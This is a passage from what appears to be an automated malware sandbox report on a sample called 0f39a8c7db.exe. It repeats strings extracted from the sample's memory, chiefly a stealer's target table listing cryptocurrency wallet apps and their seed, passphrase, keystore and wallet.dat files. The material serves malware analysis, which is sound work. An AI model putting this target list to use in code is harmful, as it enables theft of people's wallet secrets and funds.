Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\window-state.jsonl
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\window-state.jsonl
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\.X
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi 